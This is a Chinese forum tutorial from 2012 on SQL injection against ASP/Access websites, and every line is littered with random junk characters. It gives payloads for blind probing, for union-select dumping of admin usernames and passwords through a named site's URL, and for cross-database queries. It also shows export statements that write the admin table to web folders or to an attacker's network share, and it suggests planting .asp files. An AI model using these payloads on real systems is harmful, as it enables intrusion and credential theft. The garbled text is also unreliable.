--------------------------------------------------------------
4 o* {+ V, G% A0 E: q b4 wunion查询法
& o# S# M# ^& q- y6 o! m首先要说的就是查询办法,一般的查询办法就是2 N9 C3 s: }6 p( r; M1 B# c4 @6 M
% G6 }. @1 [/ o; Y程序代码
5 K- W e8 V# zand 1=(select count(*) from admin where left(id,1)='1')
; t$ _0 S4 }0 f: ~
9 P5 T5 i; b, P7 i这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯., A) F: E7 F6 g, n2 b* O9 @+ @
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
9 b$ O; I! j- x. c, D8 a譬如你有一个ACCESS点:4 F' K. \+ h5 l9 k+ @
程序代码2 B. Z# K% S9 j
http://bbs.tian6.com/xiaoyang.asp?coder=1
. o3 F) U; Q# H4 |) h6 l+ S; T, X
) G( d% ^- |, S3 a- V知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
8 q7 B d$ f, e2 m& z& x然后我们直接来:
q- G4 k% j3 s9 f7 A程序代码, E" v! Z1 h6 W4 K* N0 e2 D. H
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
" B0 T' s9 P4 f( ]4 V2 `# ^
+ [. x$ S0 M- S" ~这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了., F, Z5 R1 [4 k' \
# f7 ^2 C. T3 @1 E2 T$ Y7 f0 T$ ^
! A9 K2 a9 \- [; e5 {
0 V5 w6 z( w' G% P( i---------------------------------------------------------------
2 [. G9 B, S# p' dAccess跨库查询
9 H; s- T9 R4 m7 N. \9 }9 i有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.) M8 k9 Q0 e& p8 d" _
跨库的查询语句:
5 n- _- u+ \$ s& C4 v9 d. k子查询:
0 A4 }6 F# o) N& a( ?1 J" `$ Y程序代码! d k1 q* ^" j! ]8 Q
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0* Y* v" q0 F" y- Z
& e, Q# P u3 C3 k" Y
union查询:
) ]' f! c! `* G1 e3 d& g程序代码3 j8 v8 F; l: Y: m9 ?5 u
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=15 C+ |7 a" W3 x9 G u
R. n/ K; ^! H; `% u6 O5 N( Q跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
7 S! g" \# r2 X, x4 [程序代码
- }9 H4 t( @: w4 M. Q `% B; Ihttp://www.4ngel.net/article/46.htm
8 S9 U, c$ v, W* ~( K dhttp://hf110.com/Article/hack/rqsl/200502/66.html/ [$ e# G/ u) R) U! v/ D
' _2 t5 [3 ~, z9 t" l& ^4 A6 V---------------------------------------------------------------, h; h8 v+ V2 [( R Z! k
Access注入,导出txt,htm,html1 _6 w+ N2 r+ e" ^9 |8 Y" b
子查询语句:' j% F: y* I7 M* ?
程序代码: U+ F* W1 v& J+ G( l
Select * into [test.txt] in 'd:\web\' 'text;' from admin7 n) c+ h& Q" E
: H' ~ F& r' q* j/ g# ~这样就把admin表的内容以test类型存进了d:\web里面.. e. o. R1 C. q. h" s
UNION查询:
% m' m+ v- P; k+ W8 i3 i) ?程序代码
) w+ X4 u5 z9 J- b/ Zunion select * into [admin.txt] in 'c:\' 'test;' from admin
0 h7 H& p8 w1 J0 A# |9 m
; Z0 u! I5 C2 V4 r而且这里也可以保存到本地来:
3 j* N1 `5 l- W/ v; x( [程序代码' ]% c0 Q: B) E0 D, O+ {! V
Select * into [test.txt] in '\\yourip\share' 'text;' from admin7 n$ U. f( ~( y# l. A. T( i
: l( G; n; ~8 C$ [
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:; s0 P& K$ a% x; Q6 i% p
1 O# [' W- d1 ^, V* N程序代码& s. x7 E$ x; ?0 K
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
2 D" ^4 Y0 a) X# Q E' v# d; W
! X/ c# f# a7 f% _) [' j, V因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
" }" G: {4 g+ W8 L |
发表于 2012-9-15 14:20:57
收藏
支持
反对